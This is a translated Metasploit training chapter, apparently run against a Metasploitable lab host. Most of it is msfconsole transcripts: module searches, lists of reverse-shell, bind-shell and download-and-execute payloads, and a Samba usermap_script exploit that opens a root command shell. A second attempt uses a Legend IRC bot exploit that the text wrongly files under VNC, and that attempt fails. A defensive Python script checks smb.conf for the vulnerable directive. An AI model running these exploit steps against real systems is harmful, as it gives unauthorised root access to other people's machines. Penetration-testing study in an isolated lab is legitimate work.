《Metasploit 魔鬼训练营》01 Getting to Know Metasploit

1. Using the Metasploit GUI tool Armitage

From the Armitage menu, choose exploits --> multi --> samba --> usermap_script.
A dialog for configuring the exploit module's parameters appears; fill in RHOST and launch it.
Once it completes, run uname -a or whoami to verify the result.

2. Using the msfconsole console to exploit a Samba vulnerability and gain control

root@kali:~# msfconsole 

msf > help search

Usage: search [keywords]

Keywords:
  app       :  Modules that are client or server attacks
  author    :  Modules written by this author
  bid       :  Modules with a matching Bugtraq ID
  cve       :  Modules with a matching CVE ID
  edb       :  Modules with a matching Exploit-DB ID
  name      :  Modules with a matching descriptive name
  platform  :  Modules affecting this platform
  ref       :  Modules with a matching ref
  type      :  Modules of a specific type (exploit, auxiliary, or post)

Examples:
  search cve:2009 type:exploit app:client

msf > search samba

Matching Modules
================

   Name                                            Disclosure Date  Rank       Description
   ----                                            ---------------  ----       -----------
   auxiliary/admin/smb/samba_symlink_traversal                      normal     Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                            normal     Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                          normal     Samba lsa_io_trans_names Heap Overflow
   auxiliary/dos/samba/read_nttrans_ea_list                         normal     Samba read_nttrans_ea_list Integer Overflow
   auxiliary/scanner/rsync/modules_list                             normal     List Rsync Modules
   auxiliary/scanner/smb/smb_uninit_cred                            normal     Samba _netr_ServerPasswordSet Uninitialized Credential State
   exploit/freebsd/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   exploit/linux/samba/chain_reply                 2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
   exploit/linux/samba/lsa_transnames_heap         2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
   exploit/linux/samba/setinfopolicy_heap          2012-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   exploit/linux/samba/trans2open                  2003-04-07       great      Samba trans2open Overflow (Linux x86)
   exploit/multi/samba/nttrans                     2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   exploit/multi/samba/usermap_script              2007-05-14       excellent  Samba "username map script" Command Execution
   exploit/osx/samba/lsa_transnames_heap           2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/osx/samba/trans2open                    2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
   exploit/solaris/samba/lsa_transnames_heap       2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/solaris/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
   exploit/unix/misc/distcc_exec                   2002-02-01       excellent  DistCC Daemon Command Execution
   exploit/unix/webapp/citrix_access_gateway_exec  2010-12-21       excellent  Citrix Access Gateway Command Execution
   exploit/windows/fileformat/ms14_060_sandworm    2014-10-14       excellent  MS14-060 Microsoft Windows OLE Package Manager Code Execution
   exploit/windows/http/sambar6_search_results     2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
   exploit/windows/license/calicclnt_getconfig     2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
   exploit/windows/smb/group_policy_startup        2015-01-26       manual     Group Policy Script Execution From Shared Resource
   post/linux/gather/enum_configs                                   normal     Linux Gather Configurations


msf > use multi/samba/usermap_script
msf exploit(usermap_script) > show payloads

Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   cmd/unix/bind_awk                                    normal  Unix Command Shell, Bind TCP (via AWK)
   cmd/unix/bind_inetd                                  normal  Unix Command Shell, Bind TCP (inetd)
   cmd/unix/bind_lua                                    normal  Unix Command Shell, Bind TCP (via Lua)
   cmd/unix/bind_netcat                                 normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/bind_netcat_gaping                          normal  Unix Command Shell, Bind TCP (via netcat -e)
   cmd/unix/bind_netcat_gaping_ipv6                     normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6
   cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/bind_zsh                                    normal  Unix Command Shell, Bind TCP (via Zsh)
   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_awk                                 normal  Unix Command Shell, Reverse TCP (via AWK)
   cmd/unix/reverse_lua                                 normal  Unix Command Shell, Reverse TCP (via Lua)
   cmd/unix/reverse_netcat                              normal  Unix Command Shell, Reverse TCP (via netcat)
   cmd/unix/reverse_netcat_gaping                       normal  Unix Command Shell, Reverse TCP (via netcat -e)
   cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_php_ssl                             normal  Unix Command Shell, Reverse TCP SSL (via php)
   cmd/unix/reverse_python                              normal  Unix Command Shell, Reverse TCP (via Python)
   cmd/unix/reverse_python_ssl                          normal  Unix Command Shell, Reverse TCP SSL (via python)
   cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
   cmd/unix/reverse_zsh                                 normal  Unix Command Shell, Reverse TCP (via Zsh)

msf exploit(usermap_script) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)


Payload options (cmd/unix/bind_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(usermap_script) > set RHOST 172.16.0.135
RHOST => 172.16.0.135
msf exploit(usermap_script) >
msf exploit(usermap_script) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (172.16.0.132:32807 -> 172.16.0.135:4444) at 2017-08-16 08:27:37 -0400

uname -a
Linux www.metasploitable.tst 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

whoami
root
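The usermap_script module used above only works against a Samba server whose smb.conf enables the "username map script" directive (the value of that directive is handed to a shell). As an added check, not part of the original post, the script below parses an smb.conf the way Samba normalizes parameter names (case and whitespace ignored) and reports where that directive is set; the sample configurations and the script path in them are constructed for illustration.

```python
"""Audit a Samba smb.conf for the 'username map script' directive.

A defender confirming exposure to the usermap_script exploit wants to know
whether this directive is present at all; if it is, the affected host should
be patched or the directive removed. Added example; the configs are constructed.
"""
import re

# Constructed sample: a configuration that enables the weak directive.
WEAK_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   Username Map Script = /etc/samba/scripts/mapusers.sh
   security = user

[homes]
   comment = Home Directories
   browseable = no
"""

# Constructed sample: the same configuration with the directive removed.
HARDENED_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   security = user

[homes]
   comment = Home Directories
   browseable = no
"""

_SECTION = re.compile(r"^\[(?P<name>[^\]]+)\]$")
_PARAM = re.compile(r"^(?P<key>[^=;#]+?)\s*=\s*(?P<value>.*)$")


def parse_smb_conf(text):
    """Return {section: {normalized_key: value}}.

    Samba ignores case and whitespace in parameter names, so
    'Username Map Script' and 'usernamemapscript' are the same key.
    Lines starting with ';' or '#' are comments.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        m = _SECTION.match(line)
        if m:
            current = m.group("name").strip().lower()
            sections.setdefault(current, {})
            continue
        m = _PARAM.match(line)
        if m and current is not None:
            key = re.sub(r"\s+", "", m.group("key")).lower()
            sections[current][key] = m.group("value").strip()
    return sections


def find_username_map_script(text):
    """Return [(section, value)] for every 'username map script' setting."""
    return [(sec, params["usernamemapscript"])
            for sec, params in parse_smb_conf(text).items()
            if "usernamemapscript" in params]


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        hits = find_username_map_script(conf)
        print(f"{label}: {hits if hits else 'no username map script directive'}")
```

Run it against a real /etc/samba/smb.conf by reading the file into `find_username_map_script`; an empty result means the directive is absent, not that the Samba build is patched.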

3. Using the msfconsole console to exploit a VNC vulnerability and gain control

msf > search vnc

Matching Modules
================

   Name                                                 Disclosure Date  Rank       Description
   ----                                                 ---------------  ----       -----------
   auxiliary/admin/vnc/realvnc_41_bypass                2006-05-15       normal     RealVNC NULL Authentication Mode Bypass
   auxiliary/scanner/vnc/vnc_login                                       normal     VNC Authentication Scanner
   auxiliary/scanner/vnc/vnc_none_auth                                   normal     VNC Authentication None Detection
   auxiliary/server/capture/vnc                                          normal     Authentication Capture: VNC
   exploit/multi/misc/legend_bot_exec                   2015-04-27       excellent  Legend Perl IRC Bot Remote Code Execution
   exploit/multi/vnc/vnc_keyboard_exec                  2015-07-10       great      VNC Keyboard Remote Code Execution
   exploit/windows/vnc/realvnc_client                   2001-01-29       normal     RealVNC 3.3.7 Client Buffer Overflow
   exploit/windows/vnc/ultravnc_client                  2006-04-04       normal     UltraVNC 1.0.1 Client Buffer Overflow
   exploit/windows/vnc/ultravnc_viewer_bof              2008-02-06       normal     UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
   exploit/windows/vnc/winvnc_http_get                  2001-01-29       average    WinVNC Web Server GET Overflow
   payload/windows/vncinject/bind_hidden_ipknock_tcp                     normal     VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
   payload/windows/vncinject/bind_hidden_tcp                             normal     VNC Server (Reflective Injection), Hidden Bind TCP Stager
   payload/windows/vncinject/bind_ipv6_tcp                               normal     VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   payload/windows/vncinject/bind_ipv6_tcp_uuid                          normal     VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   payload/windows/vncinject/bind_nonx_tcp                               normal     VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   payload/windows/vncinject/bind_tcp                                    normal     VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
   payload/windows/vncinject/bind_tcp_rc4                                normal     VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   payload/windows/vncinject/bind_tcp_uuid                               normal     VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   payload/windows/vncinject/find_tag                                    normal     VNC Server (Reflective Injection), Find Tag Ordinal Stager
   payload/windows/vncinject/reverse_hop_http                            normal     VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   payload/windows/vncinject/reverse_http                                normal     VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   payload/windows/vncinject/reverse_http_proxy_pstore                   normal     VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
   payload/windows/vncinject/reverse_ipv6_tcp                            normal     VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   payload/windows/vncinject/reverse_nonx_tcp                            normal     VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   payload/windows/vncinject/reverse_ord_tcp                             normal     VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   payload/windows/vncinject/reverse_tcp                                 normal     VNC Server (Reflective Injection), Reverse TCP Stager
   payload/windows/vncinject/reverse_tcp_allports                        normal     VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   payload/windows/vncinject/reverse_tcp_dns                             normal     VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   payload/windows/vncinject/reverse_tcp_rc4                             normal     VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   payload/windows/vncinject/reverse_tcp_rc4_dns                         normal     VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   payload/windows/vncinject/reverse_tcp_uuid                            normal     VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
   payload/windows/vncinject/reverse_winhttp                             normal     VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
   payload/windows/x64/vncinject/bind_ipv6_tcp                           normal     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
   payload/windows/x64/vncinject/bind_ipv6_tcp_uuid                      normal     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
   payload/windows/x64/vncinject/bind_tcp                                normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
   payload/windows/x64/vncinject/bind_tcp_uuid                           normal     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
   payload/windows/x64/vncinject/reverse_http                            normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   payload/windows/x64/vncinject/reverse_https                           normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   payload/windows/x64/vncinject/reverse_tcp                             normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
   payload/windows/x64/vncinject/reverse_tcp_uuid                        normal     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
   payload/windows/x64/vncinject/reverse_winhttp                         normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
   payload/windows/x64/vncinject/reverse_winhttps                        normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
   post/multi/gather/remmina_creds                                       normal     UNIX Gather Remmina Credentials
   post/osx/gather/enum_chicken_vnc_profile                              normal     OS X Gather Chicken of the VNC Profile
   post/windows/gather/credentials/mremote                               normal     Windows Gather mRemote Saved Password Extraction
   post/windows/gather/credentials/vnc                                   normal     Windows Gather VNC Password Extraction

msf > use multi/misc/legend_bot_exec
msf exploit(legend_bot_exec) > show payloads

Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   cmd/unix/bind_awk                                    normal  Unix Command Shell, Bind TCP (via AWK)
   cmd/unix/bind_lua                                    normal  Unix Command Shell, Bind TCP (via Lua)
   cmd/unix/bind_netcat                                 normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/bind_netcat_gaping                          normal  Unix Command Shell, Bind TCP (via netcat -e)
   cmd/unix/bind_netcat_gaping_ipv6                     normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6
   cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/bind_zsh                                    normal  Unix Command Shell, Bind TCP (via Zsh)
   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_awk                                 normal  Unix Command Shell, Reverse TCP (via AWK)
   cmd/unix/reverse_lua                                 normal  Unix Command Shell, Reverse TCP (via Lua)
   cmd/unix/reverse_netcat                              normal  Unix Command Shell, Reverse TCP (via netcat)
   cmd/unix/reverse_netcat_gaping                       normal  Unix Command Shell, Reverse TCP (via netcat -e)
   cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_php_ssl                             normal  Unix Command Shell, Reverse TCP SSL (via php)
   cmd/unix/reverse_python                              normal  Unix Command Shell, Reverse TCP (via Python)
   cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
   cmd/unix/reverse_zsh                                 normal  Unix Command Shell, Reverse TCP (via Zsh)
   cmd/windows/adduser                                  normal  Windows Execute net user /ADD CMD
   cmd/windows/bind_lua                                 normal  Windows Command Shell, Bind TCP (via Lua)
   cmd/windows/bind_perl                                normal  Windows Command Shell, Bind TCP (via Perl)
   cmd/windows/bind_perl_ipv6                           normal  Windows Command Shell, Bind TCP (via perl) IPv6
   cmd/windows/bind_ruby                                normal  Windows Command Shell, Bind TCP (via Ruby)
   cmd/windows/download_eval_vbs                        normal  Windows Executable Download and Evaluate VBS
   cmd/windows/download_exec_vbs                        normal  Windows Executable Download and Execute (via .vbs)
   cmd/windows/generic                                  normal  Windows Command, Generic Command Execution
   cmd/windows/reverse_lua                              normal  Windows Command Shell, Reverse TCP (via Lua)
   cmd/windows/reverse_perl                             normal  Windows Command, Double Reverse TCP Connection (via Perl)
   cmd/windows/reverse_ruby                             normal  Windows Command Shell, Reverse TCP (via Ruby)

msf exploit(legend_bot_exec) > set payloads cmd/unix/bind_awk
payloads => cmd/unix/bind_awk
msf exploit(legend_bot_exec) > show options

Module options (exploit/multi/misc/legend_bot_exec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CHANNEL       #channel         yes       IRC Channel
   IRC_PASSWORD                   no        IRC Connection Password
   NICK          msf_user         yes       IRC Nickname
   RHOST                          yes       The target address
   RPORT         6667             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Legend IRC Bot

msf exploit(legend_bot_exec) > set RHOST 172.16.0.135
RHOST => 172.16.0.135
msf exploit(legend_bot_exec) > exploit

[*] Started reverse TCP double handler on 172.16.0.132:4444 
[*] 172.16.0.135:6667 - 172.16.0.135:6667 - Registering with the IRC Server...
[*] 172.16.0.135:6667 - 172.16.0.135:6667 - Joining the #channel channel...
[*] 172.16.0.135:6667 - 172.16.0.135:6667 - Exploiting the malicious IRC bot...
[*] Exploit completed, but no session was created.
The experiment did not succeed. Note that `set payloads` (plural) only creates a datastore variable named `payloads`; it does not set the module's `payload` option, so the module ran with its default payload (the handler line above is a reverse TCP handler, not the intended bind_awk bind payload).

4. Summary of the process

Taking VNC as an example:
msf > search vnc

msf > use multi/misc/legend_bot_exec

msf exploit(legend_bot_exec) > show payloads
msf exploit(legend_bot_exec) > set payload cmd/unix/bind_awk
payload => cmd/unix/bind_awk

msf exploit(legend_bot_exec) > show options
msf exploit(legend_bot_exec) > set RHOST 172.16.0.135
RHOST => 172.16.0.135

msf exploit(legend_bot_exec) > exploit
